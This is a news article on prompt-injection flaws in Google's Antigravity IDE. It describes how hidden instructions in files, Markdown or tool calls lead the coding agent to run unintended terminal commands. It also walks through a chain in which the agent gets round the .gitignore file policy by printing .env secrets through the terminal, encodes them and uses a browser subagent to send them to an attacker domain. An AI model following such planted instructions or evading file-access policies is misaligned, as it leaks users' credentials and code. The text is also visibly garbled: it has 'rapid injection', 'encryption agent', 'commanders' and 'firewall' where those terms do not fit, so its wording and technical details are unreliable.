- Antigravity IDE allows agents to automatically execute commands with default settings
- Rapid injection attacks can cause unwanted code execution in the IDE
- Data exfiltration is done via Markdown, tool calls, or hidden instructions.
Google’s new Antigravity IDE has launched with an AI-powered design, but it already has issues that raise concerns about basic security expectations, experts warn.
researcher a Instant armor discovered that the system allows its encryption agent to automatically execute commands when certain default settings are enabled, creating opportunities for unwanted behavior.
If untrusted input appears in source files or other processed content, the agent can be manipulated to execute commands that the user never intended.
Risks associated with data access and exfiltration
The product allows the agent to perform tasks through the terminal, and while security measures have been taken, there are still some gaps in how these controls work.
These flaws create scope for rapid injection attacks, which can lead to unwanted code execution if the agent traces hidden or malicious input.
The same weakness applies to how Antigravity handles file access.
The agent has the ability to read and generate content, including files that may contain credentials or sensitive project objects.
Data exfiltration is possible when malicious instructions are hidden in Markdown, tool calls, or other text formats.
Attackers can use these channels to trick the agent into leaking internal files to locations controlled by the attacker.
Reports point to cloud logs and private code already collected during successful demonstrations, showing the seriousness of these vulnerabilities.
Google has discovered these issuesand alerts users during onboarding. However, such warnings do not preclude the possibility that commanders may operate without supervision.
Antigravity encourages users to accept recommended configurations that allow the agent to operate with minimal supervision.
The configuration puts human judgment decisions in the hands of the system, even when terminal commands require approval.
Users working with multiple agents through the Agent Management interface may not detect malicious behavior until the actions are completed.
This design assumes continuous user attention, even though the interface explicitly encourages background operation.
This can lead to sensitive tasks running unchecked, providing simple visual warnings that do not change the underlying threat.
These decisions undermine the expectations normally associated with a modern firewall or similar protection.
Despite the limitations, reference leaks can occur. The IDE is intended to prevent direct access to files in .gitignore, including .env files that store sensitive variables.
However, the agent can bypass this level by using terminal commands to print the contents of the file, thus bypassing the policy.
After collecting the data, the agent encrypts the credentials, associates them with a monitored domain, and activates a browser subagent to complete the exfiltration.
The process happens quickly and is rarely visible unless the user is actively observing the agent’s actions, which is unlikely when multiple tasks are running in parallel.
These questions highlight the risks that arise when AI tools are given broad autonomy without adequate structural safeguards.
The design is for convenience, but the current configuration gives attackers a significant advantage long before more robust defenses are implemented.